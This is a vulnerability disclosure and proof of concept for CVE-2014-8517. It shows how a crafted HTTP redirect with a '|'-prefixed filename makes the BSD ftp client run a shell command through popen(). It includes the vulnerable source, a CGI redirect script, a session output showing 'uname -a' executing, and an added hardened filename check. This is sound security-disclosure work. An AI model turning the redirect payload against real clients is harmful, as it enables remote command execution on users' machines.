- eminghuliev
- FreeBSD FTP code execution
- CVE ID: CVE-2014-8517
- ___ snippet ___
- ==== > fetch_url(const char *url, const char *proxyenv, char *proxyauth, char *wwwauth)
-     /*
-      * Only trust filenames with special meaning if they came from
-      * the command line
-      */
-     if (outfile == savefile) {
-         if (strcmp(savefile, "-") == 0) {
-             fout = stdout;
-         } else if (*savefile == '|') {
-             oldpipe = xsignal(SIGPIPE, SIG_IGN);
-             fout = popen(savefile + 1, "w");
-             if (fout == NULL) {
-                 warn("Can't execute `%s'", savefile + 1);
-                 goto cleanup_fetch_url;
-             }
-             closefunc = pclose;
-         }
-     }
- If the output filename begins with the "|" symbol, the command is executed.
- |||||| If a pipe symbol is sent, the popen function is executed.
- Proof:
- else if (*savefile == '|') {
- === > fout = popen(savefile + 1, "w");
- popen function description:
- popen - initiate pipe streams to or from a process
- The popen() function shall execute the command specified by the string command. It shall create a pipe between the calling program and the executed command, and shall return a pointer to a stream that can be used to either read from or write to the pipe. The environment of the executed command shall be as if a child process were created within the popen() call using the fork() function, and the child invoked the sh utility using the call:
- a20$ pwd
- /var/www/cgi-bin
- a20$ ls -l
- total 4
- -rwxr-xr-x 1 root wheel 159 Oct 14 02:02 redirect
- -rwxr-xr-x 1 root wheel 178 Oct 14 01:54 |uname -a
- a20$ cat redirect
- #!/bin/sh
- echo 'Status: 302 Found'
- echo 'Content-Type: text/html'
- echo 'Connection: keep-alive'
- echo 'Location: http://192.168.2.19/cgi-bin/|uname%20-a'
- echo
- a20$
- a20$ ftp http://localhost/cgi-bin/redirect
- Trying ::1:80 ...
- ftp: Can't connect to `::1:80': Connection refused
- Trying 127.0.0.1:80 ...
- Requesting http://localhost/cgi-bin/redirect
- Redirected to http://192.168.2.19/cgi-bin/|uname%20-a
- Requesting http://192.168.2.19/cgi-bin/|uname%20-a
- 32 101.46 KiB/s
- 32 bytes retrieved in 00:00 (78.51 KiB/s)
- NetBSD a20 7.99.1 NetBSD 7.99.1 (CUBIEBOARD) #113: Sun Oct 26 12:05:36
- reference:
- http://pubs.opengroup.org/onlinepubs/009695399/functions/popen.html
- http://seclists.org/oss-sec/2014/q4/459
- @st1ll_di3
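
A hardened form of the check in the snippet above, as an added example (not code from the paste or from the ftp source tree): the caller states where the filename came from, so a name derived from a redirect URL is never handed to `popen()`. The enum names, `url_to_filename` and `classify_output` are hypothetical, and rejecting dotfiles and path separators in server-supplied names is an extra assumption.

```c
#include <ctype.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

enum name_source { FROM_CMDLINE, FROM_URL };   /* hypothetical names */
enum out_kind { OUT_REJECT, OUT_FILE, OUT_STDOUT, OUT_PIPE };

/* Percent-decode the last path component of url into buf; -1 on error. */
static int url_to_filename(const char *url, char *buf, size_t len)
{
    size_t end = strcspn(url, "?#"), start = end, n = 0;
    while (start > 0 && url[start - 1] != '/')
        start--;
    for (size_t i = start; i < end; i++) {
        char c = url[i];
        if (c == '%' && isxdigit((unsigned char)url[i + 1]) &&
            isxdigit((unsigned char)url[i + 2])) {
            c = (char)strtol((char[]){ url[i + 1], url[i + 2], '\0' }, NULL, 16);
            i += 2;
        }
        if (c == '\0' || n + 1 >= len)
            return -1;          /* embedded NUL, or name too long */
        buf[n++] = c;
    }
    buf[n] = '\0';
    return 0;
}

/* Only a name typed on the command line may select stdout or a pipe. */
static enum out_kind classify_output(const char *name, enum name_source src)
{
    if (name == NULL || *name == '\0')
        return OUT_REJECT;
    if (src == FROM_URL)    /* server-controlled: plain file, no path, no dotfile */
        return (strchr(name, '/') || name[0] == '.') ? OUT_REJECT : OUT_FILE;
    if (*name == '|')
        return name[1] != '\0' ? OUT_PIPE : OUT_REJECT;
    return strcmp(name, "-") == 0 ? OUT_STDOUT : OUT_FILE;
}

int main(void)
{
    char name[256];     /* URL is the redirect target from the session above */
    if (url_to_filename("http://192.168.2.19/cgi-bin/|uname%20-a", name, sizeof name) == 0)
        printf("'%s' from URL -> kind %d\n", name, classify_output(name, FROM_URL));
    return 0;
}
```

With the origin passed explicitly, the redirect target from the session decodes to `|uname -a` and is classified as an ordinary file name; only the same string given on the command line selects the pipe.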